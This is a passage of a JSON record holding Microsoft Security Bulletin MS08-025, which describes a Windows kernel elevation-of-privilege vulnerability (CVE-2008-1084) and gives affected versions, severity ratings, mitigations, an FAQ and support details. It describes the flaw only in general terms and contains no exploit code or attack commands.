software versions or editions, visit Microsoft Product Support Services.\r\n\r\nCustomers who require custom support for older releases must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit Microsoft Worldwide Information, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\nTop of sectionTop of section\r\nVulnerability Information\r\n\t\r\nSeverity Ratings and Vulnerability Identifiers\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tWindows Kernel Vulnerability - CVE-2008-1084\tAggregate Severity Rating\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nImportant\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows XP Service Pack 2\r\n\t\r\n\r\nImportant\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nImportant\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2\r\n\t\r\n\r\nImportant\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2003 x64 Edition and Windows 2003 Server x64 Edition Service Pack 2\r\n\t\r\n\r\nImportant\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium based Systems\r\n\t\r\n\r\nImportant\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Vista and Windows Vista Service Pack 1\r\n\t\r\n\r\nImportant\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1\r\n\t\r\n\r\nImportant\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\r\nWindows Server 2008\r\n\t\r\n\r\nImportant\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\nTop of sectionTop of section\r\n\t\r\nWindows Kernel Vulnerability - CVE-2008-1084\r\n\r\nAn elevation of privilege vulnerability exists due to the Windows kernel improperly validating input passed from user mode to the kernel. The vulnerability could allow an attacker to run code with elevated privileges. An attacker who successfully exploited this vulnerability could execute arbitrary code and take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2008-1084.\r\n\t\r\nMitigating Factors for Windows Kernel Vulnerability - CVE-2008-1084\r\n\r\nAn attacker must have valid logon credentials and be able to log on locally to a vulnerable system in order to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Windows Kernel Vulnerability - CVE-2008-1084\r\n\r\nMicrosoft has not identified any workarounds for this vulnerability.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Windows Kernel Vulnerability - CVE-2008-1084\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an elevation of privilege vulnerability. An attacker who successfully exploited this vulnerability could execute arbitrary code and take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe Windows kernel improperly validating input passed from user mode to the Kernel.\r\n\r\nWhat is the Windows kernel? \r\nThe Windows kernel is the core of the operating system. It provides system level services such as device management and memory management, it allocates processor time to processes, and it manages error handling.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take complete control over the affected system.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nAny Windows system that allowed potentially hostile users to log on locally could be at risk from this vulnerability. Windows XP Service Pack 3 is not affected by this Vulnerability.\r\n\r\nWhat does the update do? \r\nThe update removes the vulnerability by correctly validating parameters passed to the Windows Kernel by user mode callbacks.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure. Microsoft had not received any information to indicate that this vulnerability had been publicly disclosed when this security bulletin was originally issued.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nThomas Garnier for reporting the Windows Kernel Vulnerability (CVE-2008-1084).\r\nTop of sectionTop of section\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (April 8, 2008): Bulletin published.", "modified": "2008-04-08T00:00:00", "published": "2008-04-08T00:00:00", "id": "SECURITYVULNS:DOC:19600", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19600", "title": "Microsoft Security Bulletin MS08-025 \u2013 Important Vulnerability in Windows Kernel Could Allow Elevation of Privilege (941693)", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}